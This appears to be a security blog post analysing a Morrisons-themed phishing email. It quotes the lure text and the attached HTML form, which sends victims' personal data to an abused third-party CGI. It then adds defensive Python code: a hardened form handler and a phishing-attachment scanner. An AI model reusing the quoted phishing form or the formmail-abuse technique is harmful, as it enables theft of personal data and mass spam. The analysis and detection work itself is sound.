MX Lab, http://www.mxlab.eu, started to intercept phishing emails targeting the online activities of the Morrisons supermarkets.
The emails have the subject “New Morrisons Offer”, are sent from the spoofed email address “MORRISONS <firstname.lastname@example.org>” and have the following body contents:
This email is intended to inform you that there is a new offer at Morrisons Store.
This is a 2 weeks time offer. Register your card online and you will get 35% discount when using your card to pay in our stores.
In order to start the registration process please fill and submit the form attached to this email.
© Copyright Wm Morrison Supermarkets plc 2011. All rights reserved.
Attached to the email is the file Registration_Form.htm; once opened in a browser you will see the following screen:
The images and the web site style are taken from the official http://www.morrisons.co.uk web site, but the form contents will be sent to hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi.
When examining the form code you will notice that this is in fact an abuse of a third-party CGI (Common Gateway Interface) script as well:
<form style="margin: 0px;" action="hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi" method="post">
<input name="data_order" type="hidden" value="first_name,last_name,dob_d,dob_m,dob_y,mmn,address,city,state,zip,phone_number,
<input name="submit_to" type="hidden" value="email@example.com" />
<input name="submit_by" type="hidden" value="firstname.lastname@example.org" />
<input name="form_id" type="hidden" value="Morrisons Fulls 3" />
<input name="ok_url" type="hidden" value="http://www.morrisons.co.uk/Offers/" />
These guys have figured out the values that the CGI needs in order to process the web form. That was not difficult either: at http://theburleyinn.co.uk/contact.html the same CGI is called for the site’s own contact form, and all the required field names are in that page’s HTML.
The major weakness of this CGI is that it does not check where the request comes from and, worse, it lets the submitted form itself choose the recipient (submit_to), the sender (submit_by) and the redirect target (ok_url). At the very least it should verify that the request originates from the same web site or hosting server and reject it otherwise. Note, though, that a Referer header is easily omitted or forged (a form opened from a local attachment sends none at all), so the reliable fix is to keep the recipient and redirect addresses server-side and accept only known form IDs. As it stands, anyone with some basic knowledge can abuse it to send out, for example, a massive spam campaign.
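To make the weakness concrete, here is an added example (written for this page, not MX Lab’s code and not the real form.cgi on theburleyinn.co.uk) that models a formmail-style handler twice: once trusting its hidden fields the way the abused CGI evidently does, and once with the recipient, sender and redirect fixed server-side and keyed by a known form ID. The field names come from the phishing form quoted above; the site hostname, the recipient address, the form table and the fact that mail sending is replaced by a returned dict are all assumptions so that the module runs offline.

```python
"""Added example: a naive formmail-style CGI handler next to a hardened one.
Not the page's or the site's own code; mail delivery is stubbed out and the
results are returned as dicts so the behaviour can be checked offline."""
from urllib.parse import urlsplit

# Hidden fields as posted by the phishing form (constructed from the quoted HTML,
# plus two visible fields a victim would type in).
PHISHING_POST = {
    "data_order": "first_name,last_name,dob_d,dob_m,dob_y,mmn,address,city,state,zip,phone_number",
    "submit_to": "email@example.com",
    "submit_by": "firstname.lastname@example.org",
    "form_id": "Morrisons Fulls 3",
    "ok_url": "http://www.morrisons.co.uk/Offers/",
    "first_name": "Jane",
    "last_name": "Doe",
}

# What the site's legitimate contact form would post (constructed sample).
LEGIT_POST = {
    "form_id": "contact",
    "name": "A Guest",
    "email": "guest@example.net",
    "message": "Do you have a room on Friday?",
}


def naive_handler(fields):
    """A handler that trusts every hidden field: the client decides who gets
    the mail, who it appears to be from, and where the browser goes next."""
    order = [k for k in fields.get("data_order", "").split(",") if k]
    body = "\n".join(f"{k}: {fields.get(k, '')}" for k in order)
    return {
        "accepted": True,
        "to": fields.get("submit_to"),      # attacker-chosen recipient
        "from": fields.get("submit_by"),    # attacker-chosen sender
        "subject": fields.get("form_id"),
        "body": body,
        "redirect": fields.get("ok_url"),   # attacker-chosen landing page
    }


# Hardened variant: routing lives server-side, keyed by form_id (assumed values).
SITE_HOST = "theburleyinn.co.uk"
FORMS = {
    "contact": {
        "to": "info@theburleyinn.co.uk",
        "fields": ("name", "email", "message"),
        "redirect": "/thanks.html",
    },
}
CLIENT_ROUTING_FIELDS = ("submit_to", "submit_by", "ok_url", "data_order")


def hardened_handler(fields, referer=None):
    """Accept only known form IDs, refuse any attempt by the client to steer
    mail routing, and redirect only within SITE_HOST. The Referer check is a
    cheap extra signal: a missing header proves nothing (a form opened from a
    local attachment sends none), so it is not the primary defence."""
    spec = FORMS.get(fields.get("form_id"))
    if spec is None:
        return {"accepted": False, "reason": "unknown form_id"}
    if any(k in fields for k in CLIENT_ROUTING_FIELDS):
        return {"accepted": False, "reason": "client tried to control mail routing"}
    if referer is not None and urlsplit(referer).hostname != SITE_HOST:
        return {"accepted": False, "reason": "cross-site submission"}
    body = "\n".join(f"{k}: {fields.get(k, '')}" for k in spec["fields"])
    return {
        "accepted": True,
        "to": spec["to"],
        "from": "noreply@" + SITE_HOST,
        "subject": "Web form: " + fields["form_id"],
        "body": body,
        "redirect": "http://" + SITE_HOST + spec["redirect"],
    }


if __name__ == "__main__":
    print(naive_handler(PHISHING_POST))
    print(hardened_handler(PHISHING_POST))
    print(hardened_handler(LEGIT_POST, referer="http://theburleyinn.co.uk/contact.html"))
```

Run against the phishing post, the naive handler happily mails the victim’s details to the attacker’s address and bounces the browser to morrisons.co.uk, while the hardened one rejects the unknown form ID before looking at anything else; even a legitimate form ID cannot smuggle in an ok_url.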
Once the data is submitted on the phishing form, you are redirected to the official site at http://www.morrisons.co.uk/Offers/, the address supplied in the hidden ok_url field.
Phishing attempts like this, where the HTML page comes as an attachment instead of an embedded URL, are still in use. Their main advantage for the attacker is that they are harder to detect with technologies such as Intent Analysis or SURBL lookups, which need a URL in the message body. On the other hand, as a recipient of this kind of email you should be all the more aware that it is not to be trusted: no company in the world sends you an attachment by email asking you to fill in your credit card details.
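The URL is still there, just inside the attachment rather than the mail body. As an added example (not MX Lab’s code or any vendor’s filter), the scanner below pulls every form action and hidden field out of an HTML attachment so that the usual URL checks can be applied to it, and flags the traits seen in this campaign: a form that posts to a host outside the impersonated brand, hidden mailer-style fields such as submit_to and ok_url, a redirect back to the brand after submission, and inputs asking for sensitive data. The sample attachment is constructed from the form fragment quoted above (it is not the real Registration_Form.htm); the brand allowlist, the mailer field names and the sensitive field names are assumptions.

```python
"""Added example: extract form actions and hidden fields from an HTML
attachment and flag phishing traits. Not the page's or any product's code."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed lists, seeded by the hidden fields in the quoted form.
MAILER_FIELDS = {"submit_to", "submit_by", "ok_url", "recipient", "redirect"}
SENSITIVE_FIELDS = {"mmn", "card_number", "cvv", "pin", "password"}

# Constructed sample modelled on the quoted Registration_Form.htm.
SAMPLE_ATTACHMENT = """
<html><body>
<img src="http://www.morrisons.co.uk/images/logo.gif">
<form style="margin: 0px;" action="http://theburleyinn.co.uk/cgi-theburleyinn/form.cgi" method="post">
<input name="data_order" type="hidden" value="first_name,last_name,mmn,card_number">
<input name="submit_to" type="hidden" value="email@example.com">
<input name="submit_by" type="hidden" value="firstname.lastname@example.org">
<input name="form_id" type="hidden" value="Morrisons Fulls 3">
<input name="ok_url" type="hidden" value="http://www.morrisons.co.uk/Offers/">
<input name="first_name" type="text">
<input name="mmn" type="text">
<input name="card_number" type="text">
<input type="submit" value="Register">
</form>
</body></html>
"""


class FormScanner(HTMLParser):
    """Collect each <form>'s action, method, input names and hidden values."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "hidden": {}, "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = a.get("name") or ""
            self._current["inputs"].append(name)
            if (a.get("type") or "").lower() == "hidden":
                self._current["hidden"][name] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _is_brand(host, brand_hosts):
    return any(host == b or host.endswith("." + b) for b in brand_hosts)


def scan_attachment(html, brand_hosts):
    """Return a list of human-readable findings; empty means nothing flagged."""
    parser = FormScanner()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = (urlsplit(form["action"]).hostname or "").lower()
        if host and not _is_brand(host, brand_hosts):
            findings.append(f"form posts to off-brand host {host}")
        mailer = sorted(set(form["hidden"]) & MAILER_FIELDS)
        if mailer:
            findings.append(f"hidden mailer fields {mailer}")
        redirect_host = (urlsplit(form["hidden"].get("ok_url", "")).hostname or "").lower()
        if redirect_host and _is_brand(redirect_host, brand_hosts) and not _is_brand(host, brand_hosts):
            findings.append("redirects victim back to the impersonated brand after submission")
        sensitive = sorted(SENSITIVE_FIELDS & set(form["inputs"]))
        if sensitive:
            findings.append(f"asks for sensitive data {sensitive}")
    return findings


if __name__ == "__main__":
    for line in scan_attachment(SAMPLE_ATTACHMENT, {"morrisons.co.uk"}):
        print("-", line)
```

The extracted action host (theburleyinn.co.uk here) is exactly what a URL reputation lookup needs, so an attachment-based phish loses its advantage as soon as the filter looks inside the HTML instead of only at the message body.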
[Update March 14th, 2011 – 4:30 PM Local Belgian Time]
We have noticed new phishing emails coming from the spoofed email addresses:
The attached HTML webform is requesting a CGI on a different server: